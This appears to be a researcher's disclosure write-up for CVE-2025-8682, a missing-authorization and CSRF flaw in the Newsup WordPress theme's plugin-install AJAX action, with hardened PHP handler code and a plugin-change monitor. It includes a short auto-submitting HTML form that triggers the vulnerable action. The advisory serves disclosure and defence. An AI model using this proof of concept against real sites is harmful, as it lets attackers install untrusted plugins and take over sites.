Newsup is a magazine-style WordPress theme with more than 30,000 active installations, prized for its demo importer and “one-click extras” that streamline editorial site setup. During security testing we identified CVE-2025-8682, a high-impact Missing Authorization flaw: the theme exposes an AJAX action named install_act_plugin that can be invoked by low-privileged users (Subscriber+) and, in some deployments, even unauthenticated visitors. Because the handler does not enforce a capability check (e.g., install_plugins / manage_options) and is callable without a CSRF nonce, attackers can silently initiate plugin installation/activation flows, introducing untrusted code into the site.
| Field | Value |
|---|---|
| CVE | CVE-2025-8682 |
| Plugin Version | Newsup <= 5.0.10 |
| Critical | High |
| All Time | N/A |
| Active installations | 30 000+ |
| Publicly Published | October 9, 2025 |
| Last Updated | October 9, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8682 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/newsup/newsup-5010-missing-authorization-to-authenticated-subscriber-plugin-installation |
Timeline
| Date | Event |
|---|---|
| July 29, 2025 | Plugin testing and vulnerability detection in the Newsup theme have been completed |
| July 29, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing it |
| October 9, 2025 | Registered CVE-2025-8682 |
Discovery of the Vulnerability
A review of the Newsup admin integration revealed a convenience endpoint wired to admin-ajax.php?action=install_act_plugin. Unlike secure implementations that guard such actions behind both a nonce (to prevent CSRF) and a capability check (to restrict access to Administrators), the Newsup code path accepts the request and proceeds with installation logic based solely on the presence of the action parameter. As a result, a Subscriber—or any user with a valid session—and in some configurations even a non-logged-in visitor, can execute the action by submitting a trivial POST. In the wild, this is particularly risky because many hosting stacks do not block unauthenticated admin-ajax.php access.
Understanding CSRF attacks
WordPress hardens privileged actions through two independent gates: (1) capabilities checked via current_user_can() to ensure the caller is an Administrator (or another appropriate role); and (2) nonces validated with check_ajax_referer() to defeat cross-site request forgery. Numerous historical CVEs arise when developers add only one control or skip both. Themes that expose “install/activate recommended plugin” buttons through AJAX without those checks allow low-privileged users (or unauthenticated browsers through CSRF) to install arbitrary packages. CVE-2025-8682 fits this pattern exactly: a state-changing AJAX bridge that trusts the request and browser context and never verifies that the caller is allowed to install plugins.
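The two gates described above, shown as an added illustrative example rather than Newsup's own code: an unguarded callback next to a hardened handler for the same AJAX action. The helper newsup_install_and_activate(), the nonce action name 'newsup_install_plugin', the script handle 'newsup-admin' and the allow-listed slug are assumptions for illustration.

```php
<?php
// Added example, not Newsup's code. newsup_install_and_activate( $slug ) is an
// assumed helper wrapping Plugin_Upgrader; 'newsup_install_plugin' is an assumed nonce action.

// What an unguarded callback looks like: it acts on the mere presence of the
// action, and would also be reachable anonymously if hooked on wp_ajax_nopriv_*.
function newsup_unguarded_install_act_plugin() {
    newsup_install_and_activate( sanitize_key( $_POST['slug'] ?? '' ) ); // no nonce, no capability check
    wp_die();
}

// Hardened version: hooked only for logged-in users (no wp_ajax_nopriv_ hook),
// and every request must pass all gates before any state changes.
add_action( 'wp_ajax_install_act_plugin', 'newsup_guarded_install_act_plugin' );
function newsup_guarded_install_act_plugin() {
    // Gate 1 (CSRF): a missing or stale nonce ends the request with -1 / HTTP 403.
    check_ajax_referer( 'newsup_install_plugin', 'nonce' );

    // Gate 2 (authorization): Subscribers, Authors and Editors lack these capabilities.
    if ( ! current_user_can( 'install_plugins' ) || ! current_user_can( 'activate_plugins' ) ) {
        wp_send_json_error( array( 'message' => 'You are not allowed to install plugins.' ), 403 );
    }

    // Gate 3 (input): only slugs the theme itself recommends, never caller-chosen packages or URLs.
    $allowed = array( 'example-recommended-plugin' ); // placeholder slug
    $slug    = sanitize_key( wp_unslash( $_POST['slug'] ?? '' ) );
    if ( ! in_array( $slug, $allowed, true ) ) {
        wp_send_json_error( array( 'message' => 'Unknown plugin.' ), 400 );
    }

    $result = newsup_install_and_activate( $slug );
    if ( is_wp_error( $result ) ) {
        wp_send_json_error( array( 'message' => $result->get_error_message() ), 500 );
    }
    wp_send_json_success( array( 'installed' => $slug ) );
}

// The admin screen that renders the button must emit the matching nonce so its
// JavaScript can send it as the 'nonce' POST field. Assumes 'newsup-admin' is registered.
function newsup_admin_assets() {
    if ( ! current_user_can( 'install_plugins' ) ) {
        return; // do not even render the control for users who cannot use it
    }
    wp_localize_script( 'newsup-admin', 'newsupAjax', array(
        'nonce' => wp_create_nonce( 'newsup_install_plugin' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'newsup_admin_assets' );
```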
Exploiting the CSRF Vulnerability
To exploit CVE-2025-8682, an attacker with no cookies can submit the following request:
POC:
```html
<html>
  <body>
    <form action="http://127.0.0.1/wordpress/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="install_act_plugin" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```
The ability to install or activate plugins without administrative approval is tantamount to remote code execution by proxy. An attacker could deploy a backdoored plugin to establish persistence, create new admin users, siphon data, inject SEO spam, or add web shells. On news portals and high-traffic magazines, silent installation of malicious extensions can lead to widespread phishing (malicious widgets/links), ad fraud, unauthorized redirects, or full site defacement. Because the action is easy to repeat, a single campaign can re-install the payload after cleanup, causing recurring incidents and damaging brand trust and ad partnerships.
Recommendations for Improved Security
Update Newsup to the patched release as soon as it’s available.
Harden: deploy a WAF rule to block action=install_act_plugin from untrusted origins; consider SameSite=Lax/Strict for auth cookies to reduce CSRF surface.
Minimize admins and remove stale accounts; require MFA.
Monitor plugin changes using file integrity and plugin-install hooks, and configure alerts for unexpected install/activate events.
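One way to implement the monitoring recommendation above, as an added example that is neither CleanTalk's nor Newsup's code: a must-use plugin that hooks the core activated_plugin and upgrader_process_complete actions, logs every plugin install/activation with the acting user and request path, and e-mails the site admin when the actor does not hold install_plugins. The log format and alert recipient are assumptions.

```php
<?php
/**
 * Plugin Name: Plugin Install/Activate Monitor (added example, not CleanTalk or Newsup code)
 * Place in wp-content/mu-plugins/ so an attacker-installed plugin cannot deactivate it.
 */

// Describe who triggered the change: user, admin-ajax action (if any) and remote address.
function piam_describe_actor() {
    $user = wp_get_current_user();
    $who  = $user->exists() ? $user->user_login . ' (ID ' . $user->ID . ')' : 'unauthenticated';
    $ajax = ( defined( 'DOING_AJAX' ) && DOING_AJAX )
        ? ' via admin-ajax action=' . sanitize_key( $_REQUEST['action'] ?? '' ) : '';
    $ip   = isset( $_SERVER['REMOTE_ADDR'] ) ? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) ) : 'unknown';
    return $who . $ajax . ' from ' . $ip;
}

// Log every event; alert when the actor lacks the capability the change requires.
// Note: WP-CLI and cron installs run without a user and will also be flagged.
function piam_alert( $event, $detail ) {
    $suspect = ! current_user_can( 'install_plugins' );
    $line    = sprintf( '[%s] plugin %s: %s by %s%s', gmdate( 'c' ), $event, $detail,
        piam_describe_actor(), $suspect ? ' [UNAUTHORIZED ACTOR]' : '' );
    error_log( $line );
    if ( $suspect ) {
        wp_mail( get_option( 'admin_email' ), 'Unexpected plugin ' . $event . ' on ' . home_url(), $line );
    }
}

// Fires after any plugin is activated, whatever code path triggered it.
add_action( 'activated_plugin', function ( $plugin, $network_wide ) {
    piam_alert( 'activation', $plugin . ( $network_wide ? ' (network-wide)' : '' ) );
}, 10, 2 );

// Fires when Plugin_Upgrader finishes; $hook_extra['action'] is 'install' or 'update'.
add_action( 'upgrader_process_complete', function ( $upgrader, $hook_extra ) {
    if ( ( $hook_extra['type'] ?? '' ) !== 'plugin' ) {
        return;
    }
    $info = method_exists( $upgrader, 'plugin_info' ) ? $upgrader->plugin_info() : false;
    piam_alert( $hook_extra['action'] ?? 'unknown', $info ? $info : 'unknown package' );
}, 10, 2 );
```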
By taking proactive measures to address CSRF vulnerabilities like CVE-2025-8682, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
Dmitrii I.

